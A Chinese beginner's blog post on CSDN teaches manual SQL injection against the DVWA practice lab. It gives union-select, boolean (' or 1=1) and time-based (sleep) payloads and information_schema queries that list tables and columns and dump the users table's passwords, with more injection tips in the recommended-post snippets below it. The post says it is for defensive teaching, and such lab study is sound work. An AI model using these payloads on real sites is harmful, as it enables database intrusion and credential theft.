sql手工注入

最新推荐文章于 2024-05-13 03:38:31 发布
最新推荐文章于 2024-05-13 03:38:31 发布
阅读量1.1k 收藏 9
点赞数 7
分类专栏: 前端渗透笔记
本文链接:https://blog.csdn.net/weixin_43221560/article/details/91902122
版权

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于它用途

搞了两天得我,终于明白了一点SQL注入的原理
sql注入说白了就是对于数据库的查询没有进行防护过滤,攻击者通过构造sql查询语句,达到查看数据库信息的一种方式。
本次是通过dvwa的sql注入口进行学习
在这里插入图片描述

本次注入测试只是针对于MySQL数据库低安全度的查询语句:

$id = $_GET['id'];

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

这一句算是最基础的数据库查询语句,通过user_id=@aa条件来查找dvwa库users表中的列的信息。
由于没有对用户的输入$id进行过滤,就很容易构造出各种各样花里胡哨的查询库信息的语句。

先了解一下MySQL内部中的一小部分语句:

show database;显示所有数据库
show tables;显示数据库列表
select database();显示当前的库
select user();显示当前的用户
select now();当前时间
use dvwa;进入dvwa库
desc users;查看表users内容
desc dvwa.users;可以从这个库看别的库的表名

sql注入可以分四种:基于错误的注入,基于布尔类型,联合查询,基于时间注入

基于错误注入:

最主要的是 ,如果查询时报错,说明没有对输入内容进行过滤,就有可能存在注入点,当然,对于其他进行了优化处理的,需要你自己慢慢摸索。

MySQL中查询语句:

select * from users;查看users表中所有字段
select * from dvwa.users;查看dvwa库的users表中的字段
select user,passwd from users;从users表查询user和passwd表

条件查询where 条件:

select * from mysql.users where user=root; #root为字段
select * from mysql.users where user='root'; #root为值,数字不能是字段,需要引号
select user,passwd from users where user=8888 or 1=1; #user=88不成立,1=1成立,所以整条语句成立

union 联合查询:前后字段数要相同

select * from admin where users union select 15,66,33; #*的字段数目要个后面字段数一致,这就要猜字段数,数字可以随便充当字段。
select user,passwd,first_name from users union select first_name,last_name,3 from dvwa.users limit 5; #limit是显示几行
select * from admin.user;数据库user表名

懂得了前面的查询语句,就可以在sql注入时进行各种构造

基本模板是:

' or 1=1 union select 1,2,3 from users where users_id =1 --

注意得到是单引号是把前面的语句补齐,双横线是把后面的内容给注释掉。

基于时间的注入

在盲注时候,输入单引号可能不会报错,所以你无法确切是否存在sql注入。这时候就需要一个时间睡眠

1' sleep(5) --

如果查询延续了五秒,说明没有被过滤,存在SQL注入

information_schema

这是数据库中非常特殊的一个库,也是非常牛逼的一个库,只要搞到里面的信息,整个数据库的信息你基本都可以查到了。它相当于数据库字典,查询数据库名和表名。
select table_schema,group_concat(table_name) from information_schema.tables group by table_schema; #查询数据库名和对应的表名
各种构造:
' union select 1,table_name from information_schema.tables -- ' 查询表名
' union select 1,column_name from information_schema.columns where table_name='users' -- 查询列名

' union select user,password from users -- emm

' union select password,concat(first_name, ' ##' ,last_name, ' **' , user) from users -- 查询多个信息

以上是我通过手工注入时所用到的各种语句,如果嫌麻烦可以用sqlmap等神奇的工具进行查询。但好多sql查询还是靠手工测试来的准确,所以懂得sql注入的原理还是比较重要的。在这里插入图片描述

XG小刚
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SQL手工注入漏洞测试(MySQL数据库)
asd158923328的博客
08-20 1461
靶场地址: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 根据题意 进入页面 找到注入点 and 1=1 页面正常 and 1=2 页面报错 通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有1个字段。 通过SQL语句中order by N 来判...
《5大著名免费SQL注入工具》
08-13
5大著名免费SQL注入工具。文档介绍. 5大著名免费SQL注入工具。文档介绍.
SQL手工注入实例
01-04
这是一个简单的小实例,供大家学习交流使用,通过简单的模仿使大家对注入技术有所了解,通过一次成功的注入,增加学习的兴趣
收集PHP+MySQL手工注入语句大全
weixin_34061042的博客
08-29 257
暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用)...
SQL手工注入流程
最新发布
2401_84969746的博客
05-13 677
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[转] sql注入手工注入示例详解
weixin_34293141的博客
12-24 267
2019独角兽企业重金招聘Python工程师标准>>> ...
手工SQL注入教程
xdy3008的专栏
11-06 2862
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。 SQL注入的原理,就是从客户端
SQL手工注入测试
十年磨一剑,霜刃未曾试!
09-24 5677
login.html 请登录 请输入密码: 用 户: 密 码: login.asp 登录 <% inname=Request("name") inpass=Request("pass") set co
sql手工注入原理
春日野穹
09-13 3575
判断是否存在注入 纯粹一些个人练习心得,所以今天就写一篇博客记录一下 数值型 1.URL输入 and 1=1 / and 1=2 回显页面不同(整形判断) 如果页面运行错误,则说明此 Sql 注入为数字型注入。 因为当我们输入 and 1=1时,后台执行 Sql 语句: 如:select * from <表名> where id = x and 1=1 没有语法错误且逻辑判断为正确,所...
mysql 手工sql注入_SQL 手工注入大全
weixin_35025310的博客
02-27 217
比方说在查询id是50的数据时,如果用户传近来的参数是50 and 1=1,如果没有设置过滤的话,可以直接查出来,SQL 注入一般在ASP程序中遇到最多,看看下面的1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user>03.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (s...
SQL手工注入方法
2301_78145678的博客
06-10 141
核心原理: MySql内置的infromation_schema库,它功能强大,是我们进行MySql注入的基石!
sql注入手工注入的一般套路
qq_25987491的博客
04-14 2180
这道题不是考工具使用,我们要练习手工注入……. 题目:简单的sql注入之3 地址:http://www.shiyanbar.com/ctf/1909 没有手工注入的小伙伴们看看了,跟着daoskc的思路一起学习下。 本文的手工的暴力猜解都由BurpSuite完成 首先先作判断: 正常情况下输入?id=1,页面正常输出hello,?id=0页面不输出 输入?id=’页面直接报SQL语法错...
sql注入
paradise
02-19 83
URL中的特殊字符 URL特殊符号及对应的十六进制值编码: + URL中+号表示空格 %2B 空格 URL中的空格可以用+号或者编码 %20 / 分隔目录和子目录 %2F ? 分隔实际的 URL 和参数 %3F...
SQL手工注入探索旅程(一)
Louisnie
09-30 9308
SQL注入漏洞原理 由于程序没有过滤用户的输入,攻击者通过向服务器提交恶意的SQL查询语句,应用程序接收后错误的将攻击者的输入作为原始的SQL查询语句的一部分执行,导致改变了程序原始的SQL查询逻辑,额外的执行了攻击者构造的SQL查询语句 实验环境: kali:192.168.128.128/24 metasploit:192.168.128.129/24 我们首先看一段很简单的PHP代码查询数据...
分析SQL手工注入一般步骤
三朝看客
07-18 1938
首先,判断环境,寻找注入点,判断数据库类型,我们在前面的课程讲过。 其次,根据注入参数类型,在脑海中重构SQL语句的原貌. 按参数类型主要分为下面三种: (1) ID=131 这类注入的参数是数字型,SQL语句原貌大致如下: Select * from 表名 where 字段=131 注入的参数为ID=49 And [查询条件],即是生成语句: Select * from 表名 where 字段...
1.6SQL手工注入方法
n0d_xy的博客
04-14 662
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
SQL手工注入探索旅程(二)
Louisnie
10-02 651
SQL手工注入探索旅程(一) 实验环境: kali:192.168.128.128/24 metasploitable:192.168.128.129/24 首先我们将metasploitable中的dvwa安全等级设置为low
SQL注入-LITTLE BUBBY TABLES
樊立明的专栏-测试轻骑兵
02-18 863
下面这幅漫画,很轻松的说明了SQL注入的危害!这位妈妈应该也是一位计算机行家了,她的儿子利用这条注入语句将学生表灾难性的删掉,不过最重要的是一定要气息来自互联网或输入程序的数据,因为你不知道操作者到底是否心怀鬼胎不是!哈哈!判断SQL注入的几个关键用例' or 1=1 -- SQL注入攻击'单引号用于验证sql语句是否被中断-- 连字符用于验证sql语句是否被中断"双引号用于验证sql语句是否被中断
sql手工注入 union
09-17
SQL手工注入是一种攻击技术,通过修改SQL查询语句来绕过应用程序的安全措施,并获取未授权的数据。其中,union查询是一种常用的手工注入技巧之一。通过使用union关键字,可以将两个或多个查询的结果合并在一起返回。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值